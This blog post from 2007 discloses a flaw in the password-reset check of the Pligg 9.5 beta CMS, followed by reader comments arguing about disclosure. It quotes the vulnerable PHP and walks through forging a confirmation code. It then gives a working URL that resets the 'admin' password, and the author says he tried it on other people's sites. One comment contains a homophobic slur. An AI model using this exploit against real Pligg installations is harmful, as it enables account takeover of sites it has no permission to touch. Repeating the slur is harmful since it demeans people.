Hacking Pligg 9.5 beta – Exploit

PliggPligg is a Social Bookmarking Web 2.0 Content Management System based on the popular social news website Digg.com

A security flaw makes it possible to change the password of any user and log in.

VideoSift is Hacked! VideoSift is one of the largest (still small) websites that uses Pligg.

Admin Charter - VideoSift Changing God’s Password - VideoSift

How it works:
To reinitialize a forgotten password, Pligg follows a classical process. A confirmation code is generated and sent by email to the concerned user mail box. The user has to follow the link containing the confirmation code and if the confirmation code is checked successfully, the password is reinitialized to a pre-defined value.

you can find a part of the source code in charge of this check below :

pligg_dir/libs/html1.php:

1
2
3
4
5
6
7
8
9
function generateHash($plainText, $salt = null){
  if ($salt === null) { 
    $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
  }
  else {
    $salt = substr($salt, 0, SALT_LENGTH); 
  }
  return $salt . sha1($salt . $plainText);
}

pligg_dir/login.php :

1
2
3
$confirmationcode = $_GET["confirmationcode"];
if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode){
  $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`= "'.$username.'"');

Unfortunately you can easily generate, for a given username, a confirmation code that passes successfully the check on line 2 above.

Example:

salt = 123456789 and username = admin

we have:

sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7

and thus:

$confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

with the following URL you can reinitialize the user “admin” password:

http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

Pligg Forum members have been notified about it via e-mail this morning. Most Pligg webmasters have’t signed up for the forum :( .
All Pligg websites I tried were vulnerable to this exploit. There is no commercial value for me, so don’t worry, administrators have been notified that it’s time to patch.

Share and Enjoy:
  • Digg
  • Reddit
  • del.icio.us
  • StumbleUpon
  • Technorati
  • NewsVine

129 comments »

  1. Dave Meyers said,
    May 27, 2007 @ 9:58 am

    Shame on you for posting this expoit..
    You are not helping anyone by doing this, you are only causing more problems..

  2. admin said,
    May 27, 2007 @ 10:06 am

    The expolit has been reported 2 days ago on major security websites. The patch can be found on the pligg forum.

  3. Dave Meyers said,
    May 27, 2007 @ 10:28 am

    First of all showing people HOW to EXPLOIT this is just retarded. You could have simply written an article about it and not provided the tools everyone. Secondly if there is no commercial value for you than you shouldn’t be running adsense ads along side of it. Lastly you admit to (trying) which is hacking, into other peoples sites. P.S It is against adsense terms of service to provide exploits along with their ads. So I suggest you make some changes before someone reports you to adsense.

  4. admin said,
    May 27, 2007 @ 10:37 am

    Whatever Dave…
    SecurityFocus
    Bugtraq
    etc…

  5. scripteaze said,
    October 7, 2007 @ 2:28 pm

    i think he should post the way he did, sometimes when ppl report about bugs or exploits, they dont get fixed, now maybe they will get off thier butts and fix thier garbage

  6. BigNoseJew said,
    October 12, 2007 @ 6:36 pm

    dave meyers is a homo

  7. mike said,
    September 22, 2010 @ 2:14 am

    well it might not be right but you should have emailed the concerned website about this flaw and they would have taken care of it..you know how much tension it gives when a website is hacked…

Leave a Comment